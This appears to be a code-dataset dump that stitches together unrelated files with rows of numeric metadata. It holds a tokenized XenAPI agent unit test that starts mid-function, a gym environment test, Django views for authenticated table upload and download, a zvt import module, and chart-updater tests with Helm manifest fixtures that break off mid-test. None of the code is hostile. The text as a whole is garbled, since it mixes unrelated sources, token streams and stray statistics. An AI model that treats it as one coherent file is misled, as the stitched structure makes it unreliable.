name|'xenapi_fake'
op|'.'
name|'Failure'
newline|'\n'
name|'instance'
op|'='
op|'{'
string|'"uuid"'
op|':'
string|'"fake"'
op|'}'
newline|'\n'
nl|'\n'
name|'session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'return_value'
op|'='
number|'42'
newline|'\n'
name|'mock_uuid'
op|'.'
name|'return_value'
op|'='
number|'1'
newline|'\n'
name|'if'
name|'exception'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'.'
name|'call_plugin'
op|'.'
name|'side_effect'
op|'='
name|'exception'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'.'
name|'call_plugin'
op|'.'
name|'return_value'
op|'='
op|'{'
string|"'returncode'"
op|':'
name|'returncode'
op|','
nl|'\n'
string|"'message'"
op|':'
string|'"asdf\\\\r\\\\n"'
op|'}'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'agent'
op|'.'
name|'_call_agent'
op|'('
name|'session'
op|','
name|'instance'
op|','
string|'"vm_ref"'
op|','
string|'"method"'
op|','
nl|'\n'
name|'success_codes'
op|'='
name|'success_codes'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_assert_agent_called
dedent|''
name|'def'
name|'_assert_agent_called'
op|'('
name|'self'
op|','
name|'session'
op|','
name|'mock_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'expected_args'
op|'='
op|'{'
nl|'\n'
string|"'id'"
op|':'
string|"'1'"
op|','
nl|'\n'
string|"'dom_id'"
op|':'
string|"'42'"
op|','
nl|'\n'
string|"'timeout'"
op|':'
string|"'30'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'session'
op|'.'
name|'call_plugin'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"agent"'
op|','
string|'"method"'
op|','
nl|'\n'
name|'expected_args'
op|')'
newline|'\n'
name|'session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"vm_ref"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_call_agent_works_with_defaults
dedent|''
name|'def'
name|'test_call_agent_works_with_defaults'
op|'('
name|'self'
op|','
name|'mock_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_call_agent_setup'
op|'('
name|'session'
op|','
name|'mock_uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_assert_agent_called'
op|'('
name|'session'
op|','
name|'mock_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_call_agent_fails_with_timeout
dedent|''
name|'def'
name|'test_call_agent_fails_with_timeout'
op|'('
name|'self'
op|','
name|'mock_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'AgentTimeout'
op|','
name|'self'
op|'.'
name|'_call_agent_setup'
op|','
nl|'\n'
name|'session'
op|','
name|'mock_uuid'
op|','
nl|'\n'
name|'exception'
op|'='
name|'xenapi_fake'
op|'.'
name|'Failure'
op|'('
op|'['
string|'"TIMEOUT:fake"'
op|']'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_assert_agent_called'
op|'('
name|'session'
op|','
name|'mock_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_call_agent_fails_with_not_implemented
dedent|''
name|'def'
name|'test_call_agent_fails_with_not_implemented'
op|'('
name|'self'
op|','
name|'mock_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'AgentNotImplemented'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_call_agent_setup'
op|','
nl|'\n'
name|'session'
op|','
name|'mock_uuid'
op|','
nl|'\n'
name|'exception'
op|'='
name|'xenapi_fake'
op|'.'
name|'Failure'
op|'('
op|'['
string|'"NOT IMPLEMENTED:"'
op|']'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_assert_agent_called'
op|'('
name|'session'
op|','
name|'mock_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_call_agent_fails_with_other_error
dedent|''
name|'def'
name|'test_call_agent_fails_with_other_error'
op|'('
name|'self'
op|','
name|'mock_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'AgentError'
op|','
name|'self'
op|'.'
name|'_call_agent_setup'
op|','
nl|'\n'
name|'session'
op|','
name|'mock_uuid'
op|','
nl|'\n'
name|'exception'
op|'='
name|'xenapi_fake'
op|'.'
name|'Failure'
op|'('
op|'['
string|'"asdf"'
op|']'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_assert_agent_called'
op|'('
name|'session'
op|','
name|'mock_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_call_agent_fails_with_returned_error
dedent|''
name|'def'
name|'test_call_agent_fails_with_returned_error'
op|'('
name|'self'
op|','
name|'mock_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'AgentError'
op|','
name|'self'
op|'.'
name|'_call_agent_setup'
op|','
nl|'\n'
name|'session'
op|','
name|'mock_uuid'
op|','
name|'returncode'
op|'='
string|"'42'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_assert_agent_called'
op|'('
name|'session'
op|','
name|'mock_uuid'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|XenAPIBasedAgent
dedent|''
dedent|''
name|'class'
name|'XenAPIBasedAgent'
op|'('
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
indent|' '
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|'"_add_instance_fault"'
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|','
string|'"_call_agent"'
op|')'
newline|'\n'
DECL|member|test_call_agent_swallows_error
name|'def'
name|'test_call_agent_swallows_error'
op|'('
name|'self'
op|','
name|'mock_call_agent'
op|','
nl|'\n'
name|'mock_add_instance_fault'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_error'
op|'='
name|'exception'
op|'.'
name|'AgentError'
op|'('
name|'method'
op|'='
string|'"bob"'
op|')'
newline|'\n'
name|'mock_call_agent'
op|'.'
name|'side_effect'
op|'='
name|'fake_error'
newline|'\n'
nl|'\n'
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'agent'
op|'.'
name|'_call_agent'
op|'('
string|'"bob"'
op|')'
newline|'\n'
nl|'\n'
name|'mock_call_agent'
op|'.'
name|'assert_called_once_with'
op|'('
name|'agent'
op|'.'
name|'session'
op|','
name|'agent'
op|'.'
name|'instance'
op|','
nl|'\n'
name|'agent'
op|'.'
name|'vm_ref'
op|','
string|'"bob"'
op|','
name|'None'
op|','
name|'None'
op|','
name|'None'
op|')'
newline|'\n'
name|'mock_add_instance_fault'
op|'.'
name|'assert_called_once_with'
op|'('
name|'fake_error'
op|','
name|'mock'
op|'.'
name|'ANY'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|'"_add_instance_fault"'
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|','
string|'"_call_agent"'
op|')'
newline|'\n'
DECL|member|test_call_agent_throws_error
name|'def'
name|'test_call_agent_throws_error'
op|'('
name|'self'
op|','
name|'mock_call_agent'
op|','
nl|'\n'
name|'mock_add_instance_fault'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_error'
op|'='
name|'exception'
op|'.'
name|'AgentError'
op|'('
name|'method'
op|'='
string|'"bob"'
op|')'
newline|'\n'
name|'mock_call_agent'
op|'.'
name|'side_effect'
op|'='
name|'fake_error'
newline|'\n'
nl|'\n'
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'AgentError'
op|','
name|'agent'
op|'.'
name|'_call_agent'
op|','
nl|'\n'
string|'"bob"'
op|','
name|'ignore_errors'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
name|'mock_call_agent'
op|'.'
name|'assert_called_once_with'
op|'('
name|'agent'
op|'.'
name|'session'
op|','
name|'agent'
op|'.'
name|'instance'
op|','
nl|'\n'
name|'agent'
op|'.'
name|'vm_ref'
op|','
string|'"bob"'
op|','
name|'None'
op|','
name|'None'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mock_add_instance_fault'
op|'.'
name|'called'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.709096
| 88
| 0.616693
| 6,202
| 41,635
| 3.977749
| 0.046759
| 0.164167
| 0.096879
| 0.056425
| 0.886745
| 0.838549
| 0.791407
| 0.75148
| 0.700932
| 0.652655
| 0
| 0.003736
| 0.093623
| 41,635
| 3,275
| 89
| 12.712977
| 0.649999
| 0
| 0
| 0.939237
| 0
| 0
| 0.361307
| 0.056971
| 0
| 0
| 0
| 0
| 0.018015
| 0
| null | null | 0.005191
| 0.002443
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e51c98186bb9c05942c18c0c34283865a5a26cd6
| 634
|
py
|
Python
|
tests/test.py
|
te95/grid_draw
|
d44059daa412f57aa8699f56fd75b9fe5682d715
|
[
"MIT"
] | 1
|
2019-11-04T12:49:42.000Z
|
2019-11-04T12:49:42.000Z
|
tests/test.py
|
tedai/grid_draw
|
d44059daa412f57aa8699f56fd75b9fe5682d715
|
[
"MIT"
] | null | null | null |
tests/test.py
|
tedai/grid_draw
|
d44059daa412f57aa8699f56fd75b9fe5682d715
|
[
"MIT"
] | null | null | null |
import unittest
import gym
import grid_draw
class Environment(unittest.TestCase):
def test_bw_env_make(self):
gym.make("GridDrawBw-v0")
def test_bw_env_reset(self):
env = gym.make("GridDrawBw-v0")
env.reset()
def test_bw_env_step(self):
env = gym.make("GridDrawBw-v0")
env.reset()
env.step(0)
def test_rgb_env_make(self):
gym.make("GridDrawBw-v0")
def test_rgb_env_reset(self):
env = gym.make("GridDrawBw-v0")
env.reset()
def test_rgb_env_step(self):
env = gym.make("GridDrawBw-v0")
env.reset()
env.step(0)
| 21.133333
| 39
| 0.61041
| 89
| 634
| 4.134831
| 0.224719
| 0.11413
| 0.277174
| 0.309783
| 0.733696
| 0.733696
| 0.733696
| 0.733696
| 0.733696
| 0.532609
| 0
| 0.017131
| 0.263407
| 634
| 29
| 40
| 21.862069
| 0.770878
| 0
| 0
| 0.545455
| 0
| 0
| 0.123028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.136364
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e548415d9ec6c95ca0075fb9e2e8e7268f4861e1
| 3,604
|
py
|
Python
|
blobdatabase/views.py
|
esriis/djangoapp
|
e9e7efa1b0b98cb9f3d2a3b39b22d011c64af884
|
[
"MIT"
] | null | null | null |
blobdatabase/views.py
|
esriis/djangoapp
|
e9e7efa1b0b98cb9f3d2a3b39b22d011c64af884
|
[
"MIT"
] | null | null | null |
blobdatabase/views.py
|
esriis/djangoapp
|
e9e7efa1b0b98cb9f3d2a3b39b22d011c64af884
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
from functions.tableService import uploadTable, deleteTable, writeTable
from django.contrib.auth import authenticate, login, logout
from django.views.decorators.csrf import csrf_exempt
from pathlib import Path
# from .forms import UploadFileForm
def index(request):
return HttpResponse("Hello, world. You're at the blobdatabase index.")
@csrf_exempt
def download_view(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
response = writeTable()
logout(request)
return(response)
else:
return HttpResponse("Login unsuccessful.")
else:
return HttpResponse("Login details required.")
@csrf_exempt
def upload_view(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
response = uploadTable(request.FILES['file'],decode=True)
logout(request)
return HttpResponse(response)
else:
return HttpResponse("Login unsuccessful.")
else:
return HttpResponse("Requires POST")
@csrf_exempt
def delete_view(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
response = deleteTable(request.FILES['file'],decode=True)
logout(request)
return HttpResponse(response)
else:
return HttpResponse("Login unsuccessful.")
else:
return HttpResponse("Requires POST")
@csrf_exempt
def deleteFTP_view(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
path = "tables/deleteTable.csv"
if Path(path).is_file():
response = deleteTable(open(path,encoding='utf-8-sig'))
Path(path).unlink()
else:
response = "File not found."
logout(request)
return HttpResponse(response)
else:
return HttpResponse("Login unsuccessful.")
else:
return HttpResponse("Requires POST")
@csrf_exempt
def uploadFTP_view(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
path = "tables/uploadTable.csv"
if Path(path).is_file():
response = uploadTable(open(path,encoding='utf-8-sig'))
Path(path).unlink()
else:
response = "File not found."
logout(request)
return HttpResponse(response)
else:
return HttpResponse("Login unsuccessful.")
else:
return HttpResponse("Requires POST")
| 33.06422
| 74
| 0.613485
| 360
| 3,604
| 6.105556
| 0.194444
| 0.122839
| 0.100091
| 0.073703
| 0.763421
| 0.763421
| 0.763421
| 0.738854
| 0.738854
| 0.707461
| 0
| 0.00078
| 0.288568
| 3,604
| 108
| 75
| 33.37037
| 0.856474
| 0.009156
| 0
| 0.763441
| 0
| 0
| 0.116839
| 0.012328
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0.107527
| 0.064516
| 0.010753
| 0.290323
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e582bb58479bd487bff384f35679044522a14b2a
| 278
|
py
|
Python
|
zvt/recorders/__init__.py
|
webclinic017/FinanceCenter
|
1511751fe6d7d1f1fb940ae66d29b45eb0782fea
|
[
"MIT"
] | 22
|
2020-10-22T14:24:32.000Z
|
2022-03-30T22:19:14.000Z
|
zvt/recorders/__init__.py
|
webclinic017/FinanceCenter
|
1511751fe6d7d1f1fb940ae66d29b45eb0782fea
|
[
"MIT"
] | 1
|
2021-08-14T12:19:18.000Z
|
2021-09-30T06:44:04.000Z
|
zvt/recorders/__init__.py
|
webclinic017/FinanceCenter
|
1511751fe6d7d1f1fb940ae66d29b45eb0782fea
|
[
"MIT"
] | 6
|
2021-01-14T20:50:06.000Z
|
2022-01-11T23:12:43.000Z
|
# -*- coding: utf-8 -*-
from zvt.recorders.hardcode import *
from zvt.recorders.eastmoney import *
from zvt.recorders.exchange import *
from zvt.recorders.joinquant import *
from zvt.recorders.sina import *
from zvt.recorders.baostock import *
from zvt.recorders.yahoo import *
| 30.888889
| 37
| 0.773381
| 38
| 278
| 5.657895
| 0.368421
| 0.227907
| 0.52093
| 0.613953
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004082
| 0.118705
| 278
| 8
| 38
| 34.75
| 0.873469
| 0.07554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e5b4bf9ec9ed8b69d742d858d9cf856853f023d4
| 14,529
|
py
|
Python
|
tests/test_chart_sync.py
|
rossumai/chart-updater
|
ebc649a0567ce6aba2f22186753652d25c83fc72
|
[
"Apache-2.0"
] | 5
|
2020-03-09T10:33:36.000Z
|
2022-03-04T16:49:37.000Z
|
tests/test_chart_sync.py
|
rossumai/chart-updater
|
ebc649a0567ce6aba2f22186753652d25c83fc72
|
[
"Apache-2.0"
] | 4
|
2020-05-11T13:06:09.000Z
|
2022-02-15T14:51:59.000Z
|
tests/test_chart_sync.py
|
rossumai/chart-updater
|
ebc649a0567ce6aba2f22186753652d25c83fc72
|
[
"Apache-2.0"
] | 1
|
2021-11-10T20:20:13.000Z
|
2021-11-10T20:20:13.000Z
|
import re
from os import mkdir
from subprocess import PIPE, run
from chart_updater.git import Git
from chart_updater.helm_repo import HelmRepo
from chart_updater.updater import Updater
MANIFEST_PATH = "helmrelease.yaml"
MANIFEST_WITHOUT_ANNOTATION = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
fluxcd.io/automated: "true"
spec:
chart:
values:
"""
MANIFEST_WITHOUT_CHART_VERSION_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
spec:
chart:
values:
"""
MANIFEST_WITH_SEMVER_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: semver:1.2.x
spec:
chart:
name: hello-world
version: 1.2.3
values:
"""
UPDATED_MANIFEST_WITH_SEMVER_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: semver:1.2.x
spec:
chart:
name: hello-world
version: 1.2.4
values:
"""
MANIFEST_WITH_GLOB_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
spec:
chart:
name: hello-world
version: 1.2.3
values:
"""
UPDATED_MANIFEST_WITH_GLOB_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
spec:
chart:
name: hello-world
version: 1.2.4
values:
"""
MANIFEST_WITH_REGEX_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: regex:1\\.2\\..*
spec:
chart:
name: hello-world
version: 1.2.3
values:
"""
UPDATED_MANIFEST_WITH_REGEX_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: regex:1\\.2\\..*
spec:
chart:
name: hello-world
version: 1.2.4
values:
"""
CHART_REPO_INDEX_WITH_ANOTHER_CHART = """
apiVersion: v1
entries:
cert-manager:
- version: 0.11.0
created: "2019-10-10T13:57:16.097Z"
appVersion: v0.11.0
"""
CHART_REPO_INDEX_WITH_OLD_CHARTS = """
apiVersion: v1
entries:
hello-world:
- version: 0.0.1
created: "2019-10-10T10:00:00.000Z"
appVersion: v0.11.0
- version: 0.0.2
created: "2019-10-10T13:00:00.000Z"
appVersion: v0.11.1
"""
CHART_REPO_INDEX_WITH_NEW_CHARTS = """
apiVersion: v1
entries:
hello-world:
- version: 1.2.3
created: "2020-01-02T13:57:16.097Z"
appVersion: v10.11.12
- version: 1.2.4
created: "2020-01-03T13:57:16.097Z"
appVersion: v10.11.15
- version: 1.0.0
created: "2020-01-01T13:57:16.097Z"
appVersion: v10.11.10
"""
MANIFEST_WITH_SINGLE_IMAGE = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
rossum.ai/update-image.chart-image: "true"
spec:
chart:
name: hello-world
version: 1.2.3
values:
image:
tag: v0.0.1"""
UPDATED_MANIFEST_WITH_SINGLE_IMAGE = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
rossum.ai/update-image.chart-image: "true"
spec:
chart:
name: hello-world
version: 1.2.4
values:
image:
tag: v10.11.15
"""
MANIFEST_WITH_MULTIPLE_IMAGES = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
rossum.ai/update-image.chart-image: "true"
rossum.ai/update-image.other: "true"
spec:
chart:
name: hello-world
version: 1.2.3
values:
image:
tag: v0.0.1
other:
image:
tag: v0.0.1
"""
UPDATED_MANIFEST_WITH_MULTIPLE_IMAGES = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
rossum.ai/update-image.chart-image: "true"
rossum.ai/update-image.other: "true"
spec:
chart:
name: hello-world
version: 1.2.4
values:
image:
tag: v10.11.15
other:
image:
tag: v10.11.15
"""
MANIFEST_WITH_MULTIPLE_DOCUMENTS = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
spec:
chart:
name: hello-world
version: 1.2.3
---
kind: HelmRelease
metadata:
name: hello-world2
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
spec:
chart:
name: hello-world2
version: 1.2.3
"""
MANIFEST_EMPTY = """# HelmRelease
# rossum.ai/
---
"""
MANIFEST_WITH_FLUX2 = """apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
spec:
chart:
spec:
chart: hello-world
version: 1.2.3
sourceRef:
kind: HelmRepository
name: test
namespace: flux-system
values:
"""
UPDATED_MANIFEST_WITH_FLUX2 = """apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/chart-auto-update: "true"
rossum.ai/chart-version: glob:1.2.*
spec:
chart:
spec:
chart: hello-world
version: 1.2.4
sourceRef:
kind: HelmRepository
name: test
namespace: flux-system
values:
"""
MANIFEST_NO_RELEVANT_ANNOTATIONS = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
name: hello-world
namespace: default
annotations:
rossum.ai/something: bar
spec:
chart:
name: hello-world
version: 1.2.3
"""
INITIAL_COMMIT_RE = re.compile(r"Init")
CHART_RELEASE_COMMIT_RE = re.compile(
r"Release of hello-world 1.2.4.*\+\s+version:\s+1.2.4", flags=re.DOTALL
)
SINGLE_IMAGE_RELEASE_COMMIT_RE = re.compile(
r"Release of hello-world 1.2.4.*tag:\s+v10.11.15", flags=re.DOTALL
)
MULTIPLE_IMAGES_RELEASE_COMMIT_RE = re.compile(
r"Release of hello-world 1.2.4.*tag:\s+v10.11.15.*tag:\s+v10.11.15", flags=re.DOTALL
)
HELM_REPO_URL = "mock://some.url"
HELM_REPO_INDEX = f"{HELM_REPO_URL}/index.yaml"
def test_no_annotation(empty_git_repo):
_add_manifest(MANIFEST_WITHOUT_ANNOTATION)
_init_commit()
updater = Updater(Git(empty_git_repo), HelmRepo("mock://"))
updater.update_loop(one_shot=True)
assert _get_manifest() == MANIFEST_WITHOUT_ANNOTATION
assert re.search(INITIAL_COMMIT_RE, _last_commit())
def test_no_chart_tag(empty_git_repo):
_add_manifest(MANIFEST_WITHOUT_CHART_VERSION_PATTERN)
_init_commit()
updater = Updater(Git(empty_git_repo), HelmRepo("mock://"))
updater.update_loop(one_shot=True)
assert _get_manifest() == MANIFEST_WITHOUT_CHART_VERSION_PATTERN
assert re.search(INITIAL_COMMIT_RE, _last_commit())
def test_no_chart_in_helm_repository(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_GLOB_PATTERN)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_ANOTHER_CHART)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == MANIFEST_WITH_GLOB_PATTERN
assert re.search(INITIAL_COMMIT_RE, _last_commit())
def test_no_new_chart(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_GLOB_PATTERN)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_OLD_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == MANIFEST_WITH_GLOB_PATTERN
assert re.search(INITIAL_COMMIT_RE, _last_commit())
def test_chart_updated_semver(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_SEMVER_PATTERN)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == UPDATED_MANIFEST_WITH_SEMVER_PATTERN
assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())
def test_chart_updated_glob(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_GLOB_PATTERN)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == UPDATED_MANIFEST_WITH_GLOB_PATTERN
assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())
def test_chart_updated_regex(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_REGEX_PATTERN)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == UPDATED_MANIFEST_WITH_REGEX_PATTERN
assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())
def test_default_image_updated(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_SINGLE_IMAGE)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == UPDATED_MANIFEST_WITH_SINGLE_IMAGE
assert re.search(SINGLE_IMAGE_RELEASE_COMMIT_RE, _last_commit())
def test_multiple_images_updated(empty_git_repo, requests_mock):
_add_manifest(MANIFEST_WITH_MULTIPLE_IMAGES)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
updater.update_loop(one_shot=True)
assert _get_manifest() == UPDATED_MANIFEST_WITH_MULTIPLE_IMAGES
assert re.search(MULTIPLE_IMAGES_RELEASE_COMMIT_RE, _last_commit())
def test_chart_not_updated_manifest_outside_of_path(empty_git_repo, requests_mock):
mkdir("deploy")
_add_manifest(MANIFEST_WITH_GLOB_PATTERN)
_init_commit()
requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
